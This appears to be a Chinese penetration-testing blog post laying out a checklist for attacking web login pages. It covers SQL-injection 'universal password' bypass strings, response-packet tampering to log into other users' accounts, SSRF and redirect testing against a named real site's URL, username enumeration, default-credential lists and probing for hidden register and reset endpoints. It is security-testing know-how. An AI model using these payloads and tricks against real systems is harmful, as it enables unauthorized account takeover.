请勿截屏传播

如何应对一个登录口

开局一个登录口该如何破局

开局一个登录口该如何破局

1、万能密码

常见的万能密码有

text
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'#
' or 1=1#
" or 1=1--
" or "1"="1
' OR ''='
') OR ('1'='1
') OR 1=1--
admin'--
admin' #
1' or '1'='1'--
' or 'x'='x
' or 0=0--
' or 1=1 or '
' or ''='
'='
'=0#

例如: 在 MySQL 中,password=''=0 会被解析为 (password='')=0

  • 如果 password 字段非空,则 password='' 的结果为 0(false)
  • 接着 0=0 的结果为 1(true)
  • 因此整个条件恒真,从而绕过密码验证 拓展: 在搜索的时候,字段类型是非整形,当参数为 0 的时候,并且只有一个限定条件,会导致爆表。因此可以使用这种形式?name=aaaaa'=0--+ ,然后进行爆表操作。

2、SQL注入

现在的SQL注入漏洞不多,所以得看运气,但是不能不测,万一呢?

3、返回包篡改

3.1 无密码的情况

第一种是只改一个简单的状态码,比如 400 改成 200;fail 改成 true,或者改成 success;0改成1

3.2 有密码的情况

要么注册账号,要么存在弱口令。这样就有可能绕过登陆验证,直接登录成功(当然,是登录别人的)。 (1)抓取登录的返回包(2)获取成功登录的状态码

text
{"status":1,"msg":"OK","result":"/Admin/MainPage"}

(3)登录别人的账号,密码随便,最后修改状态码就行

4、XSS漏洞

存在两个地方,第一个是在账号密码处的 xss 第二个就是在登录口,上面 url 的某个参数中存在 xss

5、SSRF漏洞

登录口,我首推荐使用 F12 查看网络,查看远程加载的图片,然后将 url 替换成 dnslog。对于这种 png 或者 jpg 的图片静态文件,burp 很多情况下,他们的数据包都是默认不抓取的。burp 历史数据包中是默认不会有任何图片静态文件数据包。 点击下面这个设置,才会开启对图片数据包的记录。

勾选这个后,才显示图片类型数据包。

有些图片之类需要远程访问,但是 burp 无法抓取。

不仅 burp,yakit 也一样,也对这种类型的 url 不进行抓取数据包。```

text
https://web.u51.com/api.u51.com/nodejs-performance-log-server/t.png_u=https%3A%2F%2Fwww.xiaolanben.com%2F&_v=1.0.21&_o=&kmdNetwork=&kmdHasBg=false&dns=0&ntw=11206&dlt=38405&dct=40231&tlt=40231

除了图片剩下的就是 url 上面的链接处,进行测试 ssrf 都是一个意思,都是发现 url 上面如果有请求其他地址,也一样去测试 ssrf,把地址替换成 dnslog,或者你自己搭建的服务,看看有没有请求记录。

6、URL跳转

这个和 ssrf 很像,在测试 ssrf 的时候,可以顺便测试 url 跳转,就是在这里输入其他链接后,浏览器直接跳转到这个地址。

7、用户名枚举

用户名枚举特征:1. 账号不存在 2.密码错误 不存在漏洞:用户名或密码错误

8、弱口令、密码爆破

每个系统开发的时候都会有测试账号,有些粗心的程序员会把测试时的账号密码放在js里面没有删去 常见的有:

text
test
test1
test01
admin
supadmin
system
1111
Admin

弱口令爆破试一下

9、目录扫描

有时候会扫到后台路径,有时候扫到未授权访问

10、猜测接口

有些登录口只有登录功能,没有注册功能和修改密码的功能,可能是前端没有显示但不代表没有 常见的注册接口:

text
/register

/register.php

/register.jsp

/register.html

常见的密码修改接口:

text
/resetpssword 

/changePassword

11、任意用户漏洞

1、任意用户密码重置

2、任意用户登录

3、任意用户注册

新故事即将发生
网站鉴权和越权攻击

评论区

评论加载中...